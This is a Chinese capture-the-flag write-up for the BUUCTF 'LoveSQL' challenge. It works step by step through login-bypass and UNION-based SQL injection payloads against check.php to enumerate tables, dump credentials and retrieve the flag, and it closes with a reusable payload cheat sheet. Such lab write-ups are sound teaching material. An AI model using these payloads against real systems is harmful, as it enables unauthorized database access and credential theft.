当前位置: 开发笔记 > 编程语言 > 正文

【BUUCTF】[极客大挑战2019]LoveSQL详细题解总结笔记Writeup

作者：泰山长征 | 来源：互联网 | 2023-10-15 19:19

【BUUCTF】[极客大挑战2019]LoveSQL一.SQL注入考点二.解题过程0.存在SQL注入1.万能密码adminor112.爆字段3.看回显4.爆数据库5.爆数据库的表6

【BUUCTF】[极客大挑战 2019]LoveSQL

一.SQL注入考点
二. 解题过程
- 0.存在SQL注入
- 1.万能密码 admin&＃39; or 1&＃61;1
- 2.爆字段
- 3.看回显
- 4.爆数据库
- 5.爆数据库的表
- 6.爆出表的列
- 7.读取内容&＃xff0c;爆flag
三、提炼总结
- 爆字段
- 看回显
- 爆数据库
- 爆数据库的表
- 爆出表的列
- 读取内容&＃xff0c;爆flag

一.SQL注入考点

在这里插入图片描述
基础知识点

union 联合查询 information表 group_concat()

注入流程

1.万能密码登陆 2.登陆后&＃xff0c;使用联合查询注入 3.爆字段 4.看回显 5.爆数据库 6.爆数据库的表 7.爆出表的列 8.爆出flag
二. 解题过程

0.存在SQL注入

加单引号报错

/check.php?username&＃61;1&＃39;&password&＃61;2 /check.php?username&＃61;1&password&＃61;2&＃39; /check.php?username&＃61;1&＃39;&password&＃61;2&＃39;

在这里插入图片描述

1.万能密码 admin’ or 1&＃61;1

或者
1’ or 1&＃61;1 #

账号 admin&＃39; or 1&＃61;1 # 密码 1

在这里插入图片描述

admin
47cb230740bc6725fd194aec8e479fc4

Tips&＃xff1a;输入框的#&＃xff0c;直接使用hackbar地址栏&＃xff0c;需将#进行URL编码&＃xff0c;即替换为%23

2.爆字段

check.php?username&＃61;admin &＃39; order by 1 %23&password&＃61;1 check.php?username&＃61;admin &＃39; order by 2 %23&password&＃61;1 check.php?username&＃61;admin &＃39; order by 3 %23&password&＃61;1

在这里插入图片描述

check.php?username&＃61;admin &＃39; order by 4 %23&password&＃61;1

改为4&＃xff0c;报错&＃xff0c;有3个字段

Unknown column &＃39;4&＃39; in &＃39;order clause&＃39;

在这里插入图片描述

3.看回显

/check.php?username&＃61;1&＃39; union select 1,2,3%23&password&＃61;1

回显点位在2、3

在这里插入图片描述

4.爆数据库

check.php?username&＃61;1&＃39; union select 1,database(),version()%23&password&＃61;1

在这里插入图片描述数据库名&＃xff1a;geek
版本&＃xff1a;10.3.18-MariaDB

5.爆数据库的表

/check.php?username&＃61;1&＃39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&＃61;database()%23&password&＃61;1

在这里插入图片描述数据库表名有&＃xff1a;
geekuser
l0ve1ysq1
根据题目&＃xff0c;表名应该就是l0ve1ysq1

6.爆出表的列

/check.php?username&＃61; 1&＃39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name&＃61;&＃39;geekuser&＃39; %23&password&＃61;1

在这里插入图片描述

/check.php?username&＃61; 1&＃39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name&＃61;&＃39;l0ve1ysq1&＃39; %23&password&＃61;1

在这里插入图片描述

7.读取内容&＃xff0c;爆flag

geekuser表

/check.php?username&＃61;1&＃39; union select 1,2,group_concat(id,username,password) from geekuser%23&password&＃61;1

在这里插入图片描述换一个
l0ve1ysq1表

/check.php?username&＃61;1&＃39; union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password&＃61;1 /check.php?username&＃61;1&＃39; union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password&＃61;1 /check.php?username&＃61;1&＃39; union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password&＃61;1

在这里插入图片描述

Your password is &＃39;1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{1cbf436f-3991-4300-9042-4f6c5f9e950f}&＃39;

Your password is &＃39;cl4y&＃64;&＃64;wo_tai_nan_le,glzjin&＃64;&＃64;glzjin_wants_a_girlfriend,Z4cHAr7zCr&＃64;&＃64;biao_ge_dddd_hm,0xC4m3l&＃64;&＃64;linux_chuang_shi_ren,Ayrain&＃64;&＃64;a_rua_rain,Akko&＃64;&＃64;yan_shi_fu_de_mao_bo_he,fouc5&＃64;&＃64;cl4y,fouc5&＃64;&＃64;di_2_kuai_fu_ji,fouc5&＃64;&＃64;di_3_kuai_fu_ji,fouc5&＃64;&＃64;di_4_kuai_fu_ji,fouc5&＃64;&＃64;di_5_kuai_fu_ji,fouc5&＃64;&＃64;di_6_kuai_fu_ji,fouc5&＃64;&＃64;di_7_kuai_fu_ji,fouc5&＃64;&＃64;di_8_kuai_fu_ji,leixiao&＃64;&＃64;Syc_san_da_hacker,flag&＃64;&＃64;flag{2c52a50a-072c-4e80-aa81-3be3eddf604f}&＃39;

flag{1cbf436f-3991-4300-9042-4f6c5f9e950f}

三、提炼总结

爆字段

1&＃39; order by 1 # 1&＃39; order by 2 # 1&＃39; order by 3 #

1&＃39; order by 1 %23 1&＃39; order by 2 %23 1&＃39; order by 3 %23

看回显

1&＃39; union select 1,2,3 #

爆数据库

1&＃39; union select 1,database(),version() #

DATABASE,VERSION

爆数据库的表

只有一个数据库&＃xff0c;省事直接相等

1&＃39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&＃61;database() #

多个数据库&＃xff0c;选择一个

1&＃39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&＃61;&＃39;DATABASE&＃39;

AAA&＃xff0c;BBB&＃xff0c;CCC

爆出表的列

1&＃39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name&＃61;&＃39;AAA&＃39; #

读取内容&＃xff0c;爆flag

读AAA表

1&＃39; union select 1,2,group_concat(id,username,password) from AAA%23&password&＃61;1

可以加ASCII码方便区别

1&＃39; union select 1,2,group_concat(username,0x40,password) from AAA%23&password&＃61;1

推荐阅读

io
Oracle中tnsnames.ora的作用和配置方法

本文介绍了Oracle数据库中tnsnames.ora文件的作用和配置方法。tnsnames.ora文件在数据库启动过程中会被读取，用于解析LOCAL_LISTENER，并且与侦听无关。文章还提供了配置LOCAL_LISTENER和1522端口的示例，并展示了listener.ora文件的内容。 ... [详细]

蜡笔小新 2023-12-14 07:44:06
io
使用pymysql的Python无法向mysql数据库中的表添加字段

WhenIusepythontoapplythepymysqlmoduletoaddafieldtoatableinthemysqldatabase,itdo ... [详细]

蜡笔小新 2023-12-12 13:45:10
input
如何在Laravel DB :: insert中返回OUTPUT子句的值？

本文介绍了在使用Laravel和sqlsrv连接到SQL Server 2016时，如何在插入查询中使用输出子句，并返回所需的值。同时讨论了使用CreatedOn字段返回最近创建的行的解决方法以及使用Eloquent模型创建后，值正确插入数据库但没有返回uniqueidentifier字段的问题。最后给出了一个示例代码。 ... [详细]

蜡笔小新 2023-12-11 10:09:09
io
Android 新闻App的本地服务器搭建教程

本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]

蜡笔小新 2023-12-14 17:15:19
io
Oracle Database 10g许可授予信息及高级功能详解

本文介绍了Oracle Database 10g许可授予信息及其中的高级功能，包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明，指导用户在Oracle Database 10g中如何使用这些功能。 ... [详细]

蜡笔小新 2023-12-14 13:12:10
io
Metasploit攻击渗透实践

本文介绍了Metasploit攻击渗透实践的内容和要求，包括主动攻击、针对浏览器和客户端的攻击，以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码，以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]

蜡笔小新 2023-12-14 12:14:09
window
解决Mac上无法使用localhost连接mysql的问题

本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题，并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别，指出了使用socket方式连接导致连接失败的原因。此外，还提供了相关链接供读者深入了解。 ... [详细]

蜡笔小新 2023-12-13 17:48:58
io
解决VS写C#项目导入MySQL数据源报错“You have a usable connection already”问题的正确方法

本文介绍了在VS写C#项目导入MySQL数据源时出现报错“You have a usable connection already”的问题，并给出了正确的解决方法。详细描述了问题的出现情况和报错信息，并提供了解决该问题的步骤和注意事项。 ... [详细]

蜡笔小新 2023-12-13 16:31:57
io
高质量SQL书写的30条建议

本文提供了30条关于优化SQL的建议，包括避免使用select *，使用具体字段，以及使用limit 1等。这些建议是基于实际开发经验总结出来的，旨在帮助读者优化SQL查询。 ... [详细]

蜡笔小新 2023-12-13 13:24:33
io
问题2：重新命名或者移动数据文件、日志文件到新的位置

本文讨论了在数据库打开和关闭状态下，重新命名或移动数据文件和日志文件的情况。针对性能和维护原因，需要将数据库文件移动到不同的磁盘上或重新分配到新的磁盘上的情况，以及在操作系统级别移动或重命名数据文件但未在数据库层进行重命名导致报错的情况。通过三个方面进行讨论。 ... [详细]

蜡笔小新 2023-12-13 13:02:24
input
MySQL显示SQL语句执行时间的实例详解

本文详细介绍了如何使用MySQL来显示SQL语句的执行时间，并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法：瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]

蜡笔小新 2023-12-12 16:16:42
input
PDO MySQL

PDOMySQL如果文章有成千上万篇，该怎样保存？数据保存有多种方式，比如单机文件、单机数据库（SQLite）、网络数据库（MySQL、MariaDB）等等。根据项目来选择，做We ... [详细]

蜡笔小新 2023-12-12 10:25:39
io
Oracle 11g物理Active Data Guard实时查询（Realtime query）特性

在Oracle11g以前版本中的的DataGuard物理备用数据库，可以以只读的方式打开数据库，但此时MediaRecovery利用日志进行数据同步的过 ... [详细]

蜡笔小新 2023-12-11 15:49:10
io
MySQL语句大全：创建、授权、查询、修改等【MySQL】的使用方法详解

本文详细介绍了MySQL语句的使用方法，包括创建用户、授权、查询、修改等操作。通过连接MySQL数据库，可以使用命令创建用户，并指定该用户在哪个主机上可以登录。同时，还可以设置用户的登录密码。通过本文，您可以全面了解MySQL语句的使用方法。 ... [详细]

蜡笔小新 2023-12-11 15:34:14
io
Postgresql备份和恢复的方法及命令行操作步骤

本文介绍了使用Postgresql进行备份和恢复的方法及命令行操作步骤。通过使用pg_dump命令进行备份，pg_restore命令进行恢复，并设置-h localhost选项，可以完成数据的备份和恢复操作。此外，本文还提供了参考链接以获取更多详细信息。 ... [详细]

蜡笔小新 2023-12-11 10:17:12

泰山长征

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章